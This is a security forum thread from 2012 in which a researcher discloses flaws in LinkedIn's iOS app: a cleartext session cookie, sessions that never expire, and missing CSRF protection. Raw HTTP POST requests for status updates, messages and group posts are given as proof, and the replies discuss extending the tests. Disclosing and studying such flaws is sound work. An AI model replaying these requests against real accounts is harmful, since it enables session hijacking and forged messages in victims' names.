Results 1 to 4 of 4

Thread: LinkedIn Mobile Apps Bad Security Architecture: A Case Study Share/Save - My123World.Com!

  1. #1
    Security Researcher
    Join Date
    Oct 2010
    Location
    Bangalore
    Posts
    14

    Lightbulb LinkedIn Mobile Apps Bad Security Architecture: A Case Study

    Breaking News: 1990's programming mistakes repeated in 2012.


    Introduction

    Well the title of the post is self explanatory. It is really sad to see the obvious programming mistakes of the 90's are being repeated, by industry giants like LinkedIn, in 2012 when we have so much documented guidelines for secure programming. Do we still call this lack of awareness?


    Responsible Disclosure Timeline

    Vendor Notified: 25th November 2011
    Vendor Response: 28th November 2011
    Conclusion: Not fixed till today (11 April 2012). No further communication from either side.

    Details

    Device Model: iPhone 4S
    Platform: Apple’s iOS 5.0
    LinkedIn App Version: <= 4.3.3 (05 April 2012)
    Note: All LinkedIn apps or sites based on touch.World's Largest Professional Network | LinkedIn are probably vulnerable.



    1. Session cookie transported over HTTP

    Severity: Medium

    Description: Session cookie “lim_auth” is transported over HTTP in clear text. This is the only authentication parameter for LinkedIn services. It is highly susceptible to be sniffed, by an attacker, with a network packet capture tool like Wireshark.


    2. Session cookie doesn’t expire

    Severity: High

    Description: The session cookie “lim_auth” doesn’t expire for a "long" i.e. until the user logs out of the mobile app and just to remind you I never log out of my mobile apps because that would mean no push notification and the annoyance of re-logging every time on a small keypad, which implies that once an attacker has successfully gain access to a user’s valid session he can use it for over a long period of time until the user has not “Singed Out” of the LinkedIn mobile application. An attacker may write an AJAX based custom frontend to easily leverage the JSON based services of LinkedIn. The attacker can, then, route his service calls through a desktop proxy server that supports URL Rewrite feature, where it can append headers to the HTTP requests made to the LinkedIn can easily access the services. I have also implemented this scenario for my testing using Charles Web Debugging Proxy.


    3. CSRF on “Status Share” Feature

    Severity: Critical

    Description: The below HTTP POST request is made whenever the user tries to “Share Status” from the LinkedIn mobile app. Since there is no token/crumb bound to this request the attacker can submit this request as many times as he wants to successfully post arbitrary messages to the vitcim’s LinkedIn profile without his knowledge.


    Code:
    POST /li/v1/updates HTTP/1.1
    Host: touch.www.linkedin.com
    User-Agent: iphone3_1
    Accept: application/json
    X-UDID: xxx3ac8b568xxxxx1ab238531xxxxx18b0axxxx
    X-System-Version: 5.0
    X-System-Name: iPhone OS
    X-Device-Model: iPhone
    Cookie: lim_auth=60d3xxxx-10xx-xxd1-bxxd-xxxa3df4bxxx
    X-LI-Track: {"clientVersion":"4.0.3","sessionId":"1326235830768","carrier":"Vodafone India","osVersion":"5.0","locale":"en_US","osName":"iPhone OS","language":"en","model":"iphone4_1"}
    X-App-Version: 4.0.3
    X-User-Language: en
    X-User-Locale: en_US Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Pragma: no-cache
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 71
    
    twitter=false&nc=1326235830768&comment=%21%21%21&visibility=connections


    4. CSRF on “New Message” Feature

    Severity: Critical

    Description: The below HTTP POST request is made whenever the user tries to send a “New Message” to any of his/her connections from the LinkedIn mobile app. Since there is no token/crumb bound to this request the attacker can submit this request as many times as he wants to successfully send arbitrary and potentially abusive messages to the vitcim’s connections or may use to do Social Engineering.


    Code:
    POST /li/v1/messages HTTP/1.1
    Host: touch.www.linkedin.com
    User-Agent: iphone3_1
    Content-Length: 60
    Accept: application/json
    X-UDID: xxx3ac8b568xxxxx1ab238531xxxxx18b0axxxx
    X-System-Version: 5.0
    X-System-Name: iPhone OS X-Device-Model: iPhone
    Cookie: lim_auth=60d3xxxx-10xx-xxd1-bxxd-xxxa3df4bxxx
    X-LI-Track: {"clientVersion":"4.0.3","sessionId":"1326661672150","carrier":"Vodafone India","osVersion":"5.0","locale":"en_US","osName":"iPhone OS","language":"en","model":"iphone4_1"}
    X-App-Version: 4.0.3
    X-User-Language: en
    X-User-Locale: en_US
    Content-Type: application/x-www-form-urlencoded
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Pragma: no-cache
    Connection: keep-alive
    
    
    type=msg&subject=Hello&to=27565348&body=Hii&nc=1326661672150


    5. CSRF on “New Discussion” in Groups Feature

    Severity: Critical

    Description: The below HTTP POST request is made whenever the user tries to start a “New Discussion” in a Group he is already associated with from the LinkedIn mobile app. Since there is no token/crumb bound to this request the attacker can submit this request as many times as he wants to successfully


    Code:
    POST /li/v1/groups/1772050/posts HTTP/1.1
    Host: touch.www.linkedin.com
    User-Agent: iphone3_1
    Content-Length: 36
    Accept: application/json
    X-UDID: xxx3ac8b568xxxxx1ab238531xxxxx18b0axxxx
    X-System-Version: 5.0
    X-System-Name: iPhone OS X-Device-Model: iPhone
    Cookie: lim_auth=60d3xxxx-10xx-xxd1-bxxd-xxxa3df4bxxx
    X-LI-Track: {"clientVersion":"4.0.3","sessionId":"1326661672150","carrier":"Vodafone India","osVersion":"5.0","locale":"en_US","osName":"iPhone OS","language":"en","model":"iphone4_1"}
    X-App-Version: 4.0.3
    X-User-Language: en
    X-User-Locale: en_US
    Content-Type: application/x-www-form-urlencoded
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Pragma: no-cache
    Connection: keep-alive
    
    
    summary=..&title=..&nc=1326661672150


    6. CSRF on “Send/Accept” in Invitations

    Severity: Critical

    Description: Similar to above explained exploits.

    Do share your concerns/thoughts through the posts below.

  2. #2
    Security Researcher
    Join Date
    May 2011
    Location
    Pune, Maharashtra, India
    Posts
    237
    Blog Entries
    1
    did you tried

    twitter=true

    to see if updates floats to twitter to (in case its linked)

    also did you tried checking the android app.
    I will download and check if android app also has simmilar flaw.

    Website :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

    Blog :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  3. #3
    Security Researcher
    Join Date
    Oct 2010
    Location
    Bangalore
    Posts
    14

    Lightbulb

    Quote Originally Posted by Anant Shrivastava View Post
    did you tried

    twitter=true

    to see if updates floats to twitter to (in case its linked)

    also did you tried checking the android app.
    I will download and check if android app also has simmilar flaw.

    Hi Anant,

    Sorry for such a late reply. Yes, the twitter options shares the content on twitter, however, it has to be granted access by the user, though.

    Next, as I said, LinkedIn mobile apps are 95% HTML5 -> a mobile website wrapped in a thin native client. And all its mobile apps use the www.touch.linkedin.com as the webservice endpoint which just implies all are vulnerable. Having that said, they released their 1st iPad client 1-2 days back, which at first look seems to be slight differently. I have installed it, will check ASAP and write my findings here.

  4. #4
    hmmm nice. In addition to that, logout rellay does not expire the session cookies. It just removes from the phone. So if we grab old cookie file, we can log into linkedin. I have reported this to Linkedin 6 months ago. Complete details are @ - LinkedIn iPhone app does not expire session on logout

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •